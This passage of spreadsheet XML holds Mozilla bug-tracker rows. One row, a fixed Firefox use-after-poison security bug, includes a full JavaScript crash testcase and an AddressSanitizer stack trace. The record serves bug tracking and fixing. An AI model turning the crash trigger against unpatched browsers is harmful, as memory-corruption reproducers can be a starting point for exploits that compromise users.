        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K1134" t="inlineStr">
        <is>
          <t>3.3.2</t>
        </is>
      </c>
      <c r="L1134" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1134" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1134" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1134" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1134" t="inlineStr"/>
      <c r="Q1134" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1134" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1134" t="inlineStr">
        <is>
          <t>Bugzilla 3.4</t>
        </is>
      </c>
      <c r="T1134" t="n">
        <v>1</v>
      </c>
      <c r="U1134" t="n">
        <v>0</v>
      </c>
      <c r="V1134" t="n">
        <v>26</v>
      </c>
      <c r="W1134" t="inlineStr">
        <is>
          <t>https://bugzilla.mozilla.org/show_bug.cgi?id=389014 reveals the alias of the two security-sensitive bugs it blocks :(</t>
        </is>
      </c>
      <c r="X1134" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1135">
      <c r="A1135" t="n">
        <v>137121</v>
      </c>
      <c r="B1135" t="inlineStr">
        <is>
          <t>2002-04-12 08:16:43 -0700</t>
        </is>
      </c>
      <c r="C1135" t="inlineStr">
        <is>
          <t>createaccount.cgi emits "Content-type: text/html" twice</t>
        </is>
      </c>
      <c r="D1135" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:29 -0800</t>
        </is>
      </c>
      <c r="E1135" t="n">
        <v>1</v>
      </c>
      <c r="F1135" t="n">
        <v>1</v>
      </c>
      <c r="G1135" t="n">
        <v>4</v>
      </c>
      <c r="H1135" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1135" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1135" t="inlineStr">
        <is>
          <t>User Accounts</t>
        </is>
      </c>
      <c r="K1135" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L1135" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1135" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1135" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1135" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1135" t="inlineStr">
        <is>
          <t>[fixed in 2.16.5] [does not affect trunk]</t>
        </is>
      </c>
      <c r="Q1135" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1135" t="inlineStr">
        <is>
          <t>minor</t>
        </is>
      </c>
      <c r="S1135" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T1135" t="n">
        <v>1</v>
      </c>
      <c r="U1135" t="n">
        <v>0</v>
      </c>
      <c r="V1135" t="n">
        <v>7</v>
      </c>
      <c r="W1135" t="inlineStr">
        <is>
          <t>One of the first things createaccount.cgi *always* does is, it clears the 
cookies.  In that code, there already is a "Content-type". 
Createaccount.cgi then calls CheckEmailSyntax(), which prints "Content-type" a 
second time.
That second time is no longer interpreted as a HTTP-Header, so it becomes 
visible on the browser screen.</t>
        </is>
      </c>
      <c r="X1135" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1136">
      <c r="A1136" t="n">
        <v>1193004</v>
      </c>
      <c r="B1136" t="inlineStr">
        <is>
          <t>2015-08-10 13:27:04 -0700</t>
        </is>
      </c>
      <c r="C1136" t="inlineStr">
        <is>
          <t>Always show permissions section in the Control Center</t>
        </is>
      </c>
      <c r="D1136" t="inlineStr">
        <is>
          <t>2016-05-10 09:13:06 -0700</t>
        </is>
      </c>
      <c r="E1136" t="n">
        <v>1</v>
      </c>
      <c r="F1136" t="n">
        <v>1</v>
      </c>
      <c r="G1136" t="n">
        <v>2</v>
      </c>
      <c r="H1136" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1136" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1136" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1136" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1136" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1136" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1136" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1136" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1136" t="inlineStr">
        <is>
          <t>[fxprivacy]</t>
        </is>
      </c>
      <c r="Q1136" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1136" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1136" t="inlineStr">
        <is>
          <t>Firefox 43</t>
        </is>
      </c>
      <c r="T1136" t="n">
        <v>1</v>
      </c>
      <c r="U1136" t="n">
        <v>0</v>
      </c>
      <c r="V1136" t="n">
        <v>22</v>
      </c>
      <c r="W1136" t="inlineStr">
        <is>
          <t>Right now, the Permissions section is only visible when there are some non-default permissions for the site.  For Bug 1188355, we should make it visible all the time, and then have the following text visible if there are no non-default preferences:
"You have not granted this page any special permissions."</t>
        </is>
      </c>
      <c r="X1136" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1137">
      <c r="A1137" t="n">
        <v>1282076</v>
      </c>
      <c r="B1137" t="inlineStr">
        <is>
          <t>2016-06-24 07:10:48 -0700</t>
        </is>
      </c>
      <c r="C1137" t="inlineStr">
        <is>
          <t>use-after-poison in nsFrameManager::CaptureFrameState</t>
        </is>
      </c>
      <c r="D1137" t="inlineStr">
        <is>
          <t>2024-05-30 09:18:42 -0700</t>
        </is>
      </c>
      <c r="E1137" t="n">
        <v>1</v>
      </c>
      <c r="F1137" t="n">
        <v>1</v>
      </c>
      <c r="G1137" t="n">
        <v>3</v>
      </c>
      <c r="H1137" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1137" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1137" t="inlineStr">
        <is>
          <t>DOM: Animation</t>
        </is>
      </c>
      <c r="K1137" t="inlineStr">
        <is>
          <t>47 Branch</t>
        </is>
      </c>
      <c r="L1137" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1137" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1137" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1137" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1137" t="inlineStr">
        <is>
          <t>[adv-main49+][adv-esr45.4+]</t>
        </is>
      </c>
      <c r="Q1137" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1137" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1137" t="inlineStr">
        <is>
          <t>mozilla50</t>
        </is>
      </c>
      <c r="T1137" t="n">
        <v>1</v>
      </c>
      <c r="U1137" t="n">
        <v>0</v>
      </c>
      <c r="V1137" t="n">
        <v>58</v>
      </c>
      <c r="W1137" t="inlineStr">
        <is>
          <t>The testcase crashes the latest Firefox ASAN build (BuildID=20160624030212) as follows:
&lt;script&gt;
function start() {
        o0=document;
        o24=document.createElement('table');
        o35=window;
        o60=document.createElement('input');
        o24.appendChild(o60);
        o62=document.body;
        o66=document.createElement('input');
        o62.appendChild(o66);
        o60.innerHTML="&lt;svg&gt;&lt;color-profile&gt;&lt;script&gt;&lt;rect&gt;&lt;animateColor&gt;&lt;style&gt;&lt;style&gt;*{ all: unset&lt;script&gt;&lt;style&gt;div&lt;style&gt;";
        o93=o60.querySelectorAll('*')[5];
        o97=o60.querySelectorAll('*')[9];
        document.body.appendChild(o24);
        o305=document.createTextNode("{}:first-line{");
        o93.appendChild(o305);
        o318=(new DOMParser()).parseFromString('','text/html');
        o320=o318.all[1];
        o355=document.createElement('style');
        o356=document.createTextNode("@keyframes key2{ from{ box-shadow: none}}#id2{ animation-name: key2; animation-duration: 0.01s");
        o355.appendChild(o356);
        o97.appendChild(o355);
        o66.style.display='list-item';
        o473=document.createElement('script');
        o24.appendChild(o473);
        o577=document.createElement('style');
        o320.appendChild(o577);
        o577.style.position='fixed';
        document.replaceChild(o318.documentElement,document.documentElement);
        o908=(new DOMParser()).parseFromString('','text/html');
        o911=o908.all[2];
        o911.style.display='inline';
        o577.id='id2';
        o1202=document.createElement('table');
        document.body=o911;
        document.body.appendChild(o1202);
        document.replaceChild(o0.documentElement,document.documentElement);
        o1232=o473.parentNode;
        o1233=o1232.parentNode;
        document.body=o1233;
        o35.scrollByLines(1);
        o577.style.position='absolute';
        setTimeout(f2, 4);
}
function f2() {
        o0.designMode='on';
        o0.execCommand('insertparagraph',false,null);
}
&lt;/script&gt;
&lt;body onload="start()"&gt;&lt;/body&gt;
ASAN ouput:
=================================================================
==30757==ERROR: AddressSanitizer: use-after-poison on address 0x6250002eab58 at pc 0x7fcd17c53104 bp 0x7ffc2eca31b0 sp 0x7ffc2eca31a8
READ of size 8 at 0x6250002eab58 thread T0 (Web Content)
    #0 0x7fcd17c53103 in GetStateBits /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/generic/nsIFrame.h:1565:46
    #1 0x7fcd17c53103 in nsFrameManager::CaptureFrameState(nsIFrame*, nsILayoutHistoryState*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsFrameManager.cpp:580
    #2 0x7fcd17aa8070 in CaptureStateForFramesOf /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsCSSFrameConstructor.cpp:9144:5
    #3 0x7fcd17aa8070 in nsCSSFrameConstructor::RecreateFramesForContent(nsIContent*, bool, nsCSSFrameConstructor::RemoveFlags, nsIContent**) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsCSSFrameConstructor.cpp:9563
    #4 0x7fcd17aa8d23 in mozilla::RestyleManager::RestyleElement(mozilla::dom::Element*, nsIFrame*, nsChangeHint, mozilla::RestyleTracker&amp;, nsRestyleHint, mozilla::RestyleHintData const&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/RestyleManager.cpp:1077:5
    #5 0x7fcd17ac8d0f in ProcessOneRestyle /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/RestyleTracker.cpp:94:5
    #6 0x7fcd17ac8d0f in mozilla::RestyleTracker::DoProcessRestyles() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/RestyleTracker.cpp:262
    #7 0x7fcd17ab03af in ProcessRestyles /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/mozilla/RestyleManager.h:536:7
    #8 0x7fcd17ab03af in mozilla::RestyleManager::ProcessPendingRestyles() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/RestyleManager.cpp:1807
    #9 0x7fcd17cdb6ca in ProcessPendingRestyles /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/mozilla/RestyleManagerHandleInlines.h:74:3
    #10 0x7fcd17cdb6ca in PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsPresShell.cpp:4119
    #11 0x7fcd138be6be in nsDocument::FlushPendingNotifications(mozFlushType) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsDocument.cpp:8393:7
    #12 0x7fcd177eee46 in nsComputedDOMStyle::UpdateCurrentStyleSources(bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/style/nsComputedDOMStyle.cpp:633:3
    #13 0x7fcd177f005b in nsComputedDOMStyle::GetPropertyCSSValue(nsAString_internal const&amp;, mozilla::ErrorResult&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/style/nsComputedDOMStyle.cpp:796:3
    #14 0x7fcd177ee507 in nsComputedDOMStyle::GetPropertyValue(nsAString_internal const&amp;, nsAString_internal&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/style/nsComputedDOMStyle.cpp:379:26
    #15 0x7fcd17500cde in nsHTMLCSSUtils::GetCSSInlinePropertyBase(nsINode*, nsIAtom*, nsAString_internal&amp;, nsHTMLCSSUtils::StyleType) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/editor/libeditor/nsHTMLCSSUtils.cpp:511:5
    #16 0x7fcd174e9e89 in GetComputedProperty /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/editor/libeditor/nsHTMLCSSUtils.cpp:491:10
    #17 0x7fcd174e9e89 in nsHTMLEditor::GetAbsolutelyPositionedSelectionContainer(nsIDOMElement**) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/editor/libeditor/nsHTMLAbsPosition.cpp:91
    #18 0x7fcd174f4486 in nsHTMLEditor::CheckSelectionStateForAnonymousButtons(nsISelection*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/editor/libeditor/nsHTMLAnonymousUtils.cpp:307:11
    #19 0x7fcd175e8495 in nsHTMLEditor::EndUpdateViewBatch() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/editor/libeditor/nsHTMLEditor.cpp:4802:11
    #20 0x7fcd174b04ae in nsEditor::EndPlaceHolderTransaction() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/editor/libeditor/nsEditor.cpp:965:7
    #21 0x7fcd175d381c in ~nsAutoPlaceHolderBatch /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/editor/libeditor/nsEditorUtils.h:51:9
    #22 0x7fcd175d381c in nsHTMLEditor::InsertBasicBlock(nsAString_internal const&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/editor/libeditor/nsHTMLEditor.cpp:2126
    #23 0x7fcd175d2216 in nsHTMLEditor::SetParagraphFormat(nsAString_internal const&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/editor/libeditor/nsHTMLEditor.cpp:1709:12
    #24 0x7fcd1768a384 in nsParagraphStateCommand::SetState(nsIEditor*, nsString&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/editor/composer/nsComposerCommands.cpp:654:10
    #25 0x7fcd176897b0 in nsMultiStateCommand::DoCommandParams(char const*, nsICommandParams*, nsISupports*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/editor/composer/nsComposerCommands.cpp:599:12
    #26 0x7fcd18a65bd3 in nsControllerCommandTable::DoCommandParams(char const*, nsICommandParams*, nsISupports*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/embedding/components/commandhandler/nsControllerCommandTable.cpp:162:10
    #27 0x7fcd18a5ca8e in DoCommandWithParams /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/embedding/components/commandhandler/nsBaseCommandController.cpp:152:10
    #28 0x7fcd18a5ca8e in non-virtual thunk to nsBaseCommandController::DoCommandWithParams(char const*, nsICommandParams*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/embedding/components/commandhandler/nsBaseCommandController.cpp:140
    #29 0x7fcd18a62caa in nsCommandManager::DoCommand(char const*, nsICommandParams*, mozIDOMWindowProxy*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/embedding/components/commandhandler/nsCommandManager.cpp:212:10
    #30 0x7fcd15f1ec29 in nsHTMLDocument::ExecCommand(nsAString_internal const&amp;, bool, nsAString_internal const&amp;, mozilla::ErrorResult&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/html/nsHTMLDocument.cpp:3249:10
    #31 0x7fcd154dcc76 in mozilla::dom::HTMLDocumentBinding::execCommand(JSContext*, JS::Handle&lt;JSObject*&gt;, nsHTMLDocument*, JSJitMethodCallArgs const&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dom/bindings/HTMLDocumentBinding.cpp:816:15
    #32 0x7fcd15753157 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/bindings/BindingUtils.cpp:2784:13
    #33 0x7fcd1b5d66c0 in CallJSNative /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/jscntxtinlines.h:235:15
    #34 0x7fcd1b5d66c0 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:452
    #35 0x7fcd1b5bd8c0 in CallFromStack /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:503:12
    #36 0x7fcd1b5bd8c0 in Interpret(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:2873
    #37 0x7fcd1b5a3858 in js::RunScript(JSContext*, js::RunState&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:398:12
    #38 0x7fcd1b5d6d88 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:470:15
    #39 0x7fcd1b5d7461 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/vm/Interpreter.cpp:516:10
    #40 0x7fcd1b1211a8 in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/js/src/jsapi.cpp:2890:12
    #41 0x7fcd153a9c6d in mozilla::dom::Function::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, nsTArray&lt;JS::Value&gt; const&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dom/bindings/FunctionBinding.cpp:36:8
    #42 0x7fcd135d07bb in Call&lt;nsCOMPtr&lt;nsISupports&gt; &gt; /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/mozilla/dom/FunctionBinding.h:70:12
    #43 0x7fcd135d07bb in nsGlobalWindow::RunTimeoutHandler(nsTimeout*, nsIScriptContext*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsGlobalWindow.cpp:12271
    #44 0x7fcd135ae64c in nsGlobalWindow::RunTimeout(nsTimeout*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsGlobalWindow.cpp:12520:32
    #45 0x7fcd13546d61 in nsGlobalWindow::TimerCallback(nsITimer*, void*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsGlobalWindow.cpp:12766:3
    #46 0x7fcd10c4fdf7 in nsTimerImpl::Fire() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsTimerImpl.cpp:524:7
    #47 0x7fcd10c270fc in nsTimerEvent::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/TimerThread.cpp:286:3
    #48 0x7fcd10c33eb8 in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/threads/nsThread.cpp:1067:7
    #49 0x7fcd10cb26bc in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/xpcom/glue/nsThreadUtils.cpp:290:10
    #50 0x7fcd11a17eff in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/glue/MessagePump.cpp:100:21
    #51 0x7fcd119862f8 in RunInternal /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:235:3
    #52 0x7fcd119862f8 in RunHandler /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:228
    #53 0x7fcd119862f8 in MessageLoop::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:208
    #54 0x7fcd1737915f in nsBaseAppShell::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/widget/nsBaseAppShell.cpp:156:3
    #55 0x7fcd194050a7 in XRE_RunAppShell /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:834:12
    #56 0x7fcd119862f8 in RunInternal /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:235:3
    #57 0x7fcd119862f8 in RunHandler /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:228
    #58 0x7fcd119862f8 in MessageLoop::Run() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/chromium/src/base/message_loop.cc:208
    #59 0x7fcd19404712 in XRE_InitChildProcess /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:664:7
    #60 0x4e2bc5 in content_process_main(int, char**) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/ipc/app/../contentproc/plugin-container.cpp:224:19
    #61 0x7fcd0dd1282f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291
    #62 0x41e778 in _start (/home/nils/fuzzer3/firefox/plugin-container+0x41e778)
0x6250002eab58 is located 6744 bytes inside of 8192-byte region [0x6250002e9100,0x6250002eb100)
allocated by thread T0 (Web Content) here:
    #0 0x4b51eb in __interceptor_malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x7fcd1ef7bdd6 in PL_ArenaAllocate /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/nsprpub/lib/ds/plarena.c:210:27
    #2 0x7fcd179fbe99 in nsPresArena::Allocate(unsigned int, unsigned long) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsPresArena.cpp:165:3
    #3 0x7fcd17926c12 in AllocateByObjectID /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsPresArena.h:65:12
    #4 0x7fcd17926c12 in AllocateByObjectID /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsIPresShell.h:250
    #5 0x7fcd17926c12 in operator new /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/style/nsStyleStruct.h:2475
    #6 0x7fcd17926c12 in nsRuleNode::ComputeDisplayData(void*, nsRuleData const*, nsStyleContext*, nsRuleNode*, nsRuleNode::RuleDetail, mozilla::RuleNodeCacheConditions) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/style/nsRuleNode.cpp:5327
    #7 0x7fcd178fb8ce in nsRuleNode::WalkRuleTree(nsStyleStructID, nsStyleContext*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/style/nsRuleNode.cpp:2491:10
    #8 0x7fcd179eea5f in GetStyleDisplay&lt;true&gt; /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/layout/style/nsStyleStructList.h:98:1
    #9 0x7fcd179eea5f in nsStyleDisplay const* nsStyleContext::DoGetStyleDisplay&lt;true&gt;() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/layout/style/nsStyleStructList.h:98
    #10 0x7fcd1797723b in StyleDisplay /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/layout/style/nsStyleStructList.h:98:1
    #11 0x7fcd1797723b in nsStyleContext::SetStyleBits() /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/style/nsStyleContext.cpp:687
    #12 0x7fcd17976fc6 in FinishConstruction /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/style/nsStyleContext.cpp:163:3
    #13 0x7fcd17976fc6 in nsStyleContext::nsStyleContext(nsStyleContext*, nsIAtom*, mozilla::CSSPseudoElementType, already_AddRefed&lt;nsRuleNode&gt;, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/style/nsStyleContext.cpp:121
    #14 0x7fcd1799a02c in NS_NewStyleContext(nsStyleContext*, nsIAtom*, mozilla::CSSPseudoElementType, nsRuleNode*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/style/nsStyleContext.cpp:1316:5
    #15 0x7fcd179a57ee in nsStyleSet::GetContext(nsStyleContext*, nsRuleNode*, nsRuleNode*, nsIAtom*, mozilla::CSSPseudoElementType, mozilla::dom::Element*, unsigned int) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/style/nsStyleSet.cpp:918:14
    #16 0x7fcd179aa6f3 in nsStyleSet::ResolveStyleFor(mozilla::dom::Element*, nsStyleContext*, TreeMatchContext&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/style/nsStyleSet.cpp:1366:10
    #17 0x7fcd17b1d612 in ResolveStyleFor /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/obj-firefox/dist/include/mozilla/StyleSetHandleInlines.h:93:3
    #18 0x7fcd17b1d612 in nsCSSFrameConstructor::ResolveStyleContext(nsStyleContext*, nsIContent*, nsFrameConstructorState*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsCSSFrameConstructor.cpp:4959
    #19 0x7fcd17b19630 in ResolveStyleContext /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsCSSFrameConstructor.cpp:4928:10
    #20 0x7fcd17b19630 in ResolveStyleContext /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsCSSFrameConstructor.cpp:4944
    #21 0x7fcd17b19630 in nsCSSFrameConstructor::AddFrameConstructionItems(nsFrameConstructorState&amp;, nsIContent*, bool, nsCSSFrameConstructor::InsertionPoint const&amp;, nsCSSFrameConstructor::FrameConstructionItemList&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsCSSFrameConstructor.cpp:5574
    #22 0x7fcd17b00233 in nsCSSFrameConstructor::ProcessChildren(nsFrameConstructorState&amp;, nsIContent*, nsStyleContext*, nsContainerFrame*, bool, nsFrameItems&amp;, bool, PendingBinding*, nsIFrame*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsCSSFrameConstructor.cpp:10685:9
    #23 0x7fcd17b1712f in nsCSSFrameConstructor::ConstructFrameFromItemInternal(nsCSSFrameConstructor::FrameConstructionItem&amp;, nsFrameConstructorState&amp;, nsContainerFrame*, nsFrameItems&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsCSSFrameConstructor.cpp:3998:9
    #24 0x7fcd17b2284c in nsCSSFrameConstructor::ConstructFramesFromItem(nsFrameConstructorState&amp;, nsCSSFrameConstructor::FrameConstructionItemList::Iterator&amp;, nsContainerFrame*, nsFrameItems&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsCSSFrameConstructor.cpp:6085:3
    #25 0x7fcd17b0f272 in ConstructFramesFromItemList /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsCSSFrameConstructor.cpp:10502:5
    #26 0x7fcd17b0f272 in nsCSSFrameConstructor::CreateAnonymousFrames(nsFrameConstructorState&amp;, nsIContent*, nsContainerFrame*, PendingBinding*, nsFrameItems&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsCSSFrameConstructor.cpp:4132
    #27 0x7fcd17b0b8b7 in nsCSSFrameConstructor::BeginBuildingScrollFrame(nsFrameConstructorState&amp;, nsIContent*, nsStyleContext*, nsContainerFrame*, nsIAtom*, bool, nsContainerFrame*&amp;) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsCSSFrameConstructor.cpp:4546:3
    #28 0x7fcd17b083d5 in nsCSSFrameConstructor::SetUpDocElementContainingBlock(nsIContent*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsCSSFrameConstructor.cpp:2875:25
    #29 0x7fcd17b04852 in nsCSSFrameConstructor::ConstructDocElementFrame(mozilla::dom::Element*, nsILayoutHistoryState*) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsCSSFrameConstructor.cpp:2411:3
    #30 0x7fcd17b28a17 in nsCSSFrameConstructor::ContentRangeInserted(nsIContent*, nsIContent*, nsIContent*, nsILayoutHistoryState*, bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsCSSFrameConstructor.cpp:7635:7
    #31 0x7fcd17cc31a7 in PresShell::Initialize(int, int) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/layout/base/nsPresShell.cpp:1728:7
    #32 0x7fcd137f38ef in nsContentSink::StartLayout(bool) /builds/slave/m-cen-l64-asan-ntly-0000000000/build/src/dom/base/nsContentSink.cpp:1210:19
